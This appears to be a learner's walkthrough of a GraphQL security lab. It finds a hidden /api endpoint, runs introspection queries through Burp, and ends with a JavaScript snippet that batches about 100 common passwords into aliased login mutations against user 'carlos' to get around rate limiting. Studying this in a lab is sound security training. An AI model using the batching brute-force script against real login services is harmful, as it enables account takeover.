To identify if there is hidden GraphQL API endpoint send an invalid GET request endpoint and observe message Not Found, but when sending /api the response is Query not present.
Enumeration of the GraphQL API endpoint require testing with a universal query.
Modify GET request with query as a URL parameter /api?query=query{__typename}.
The below response validate the identity of GraphQL endpoint:
{
"data": {
"__typename": "query"
}
}
Send a new request with a URL-encoded introspection query as a query parameter.
To do this, right-click the request and select GraphQL > Set introspection query:
This introspection query works with most GraphQL servers. However, if you are working with an older GraphQL server, it may fail. If that happens, right-click anywhere within the Request panel of the message editor, then select GraphQL > Set legacy introspection query and try again.
query IntrospectionQuery {
__schema {
queryType { name }
mutationType { name }
subscriptionType { name }
types {
...FullType
}
directives {
name
description
args {
...InputValue
}
onOperation
onFragment
onField
}
}
}
Right-click anywhere within the Response panel of the message editor, then select GraphQL > Save GraphQL queries to site map.
Brute force login
put thos mutations inside post request inside mutations{}
copy(`123456,password,12345678,qwerty,123456789,12345,1234,111111,1234567,dragon,123123,baseball,abc123,football,monkey,letmein,shadow,master,666666,qwertyuiop,123321,mustang,1234567890,michael,654321,superman,1qaz2wsx,7777777,121212,000000,qazwsx,123qwe,killer,trustno1,jordan,jennifer,zxcvbnm,asdfgh,hunter,buster,soccer,harley,batman,andrew,tigger,sunshine,iloveyou,2000,charlie,robert,thomas,hockey,ranger,daniel,starwars,klaster,112233,george,computer,michelle,jessica,pepper,1111,zxcvbn,555555,11111111,131313,freedom,777777,pass,maggie,159753,aaaaaa,ginger,princess,joshua,cheese,amanda,summer,love,ashley,nicole,chelsea,biteme,matthew,access,yankees,987654321,dallas,austin,thunder,taylor,matrix,mobilemail,mom,monitor,monitoring,montana,moon,moscow`.split(',').map((element,index)=>`
bruteforce$index:login(input:{password: "$password", username: "carlos"}) {
token
success
}
`.replaceAll('$index',index).replaceAll('$password',element)).join('\n'));console.log("The query has been copied to your clipboard.");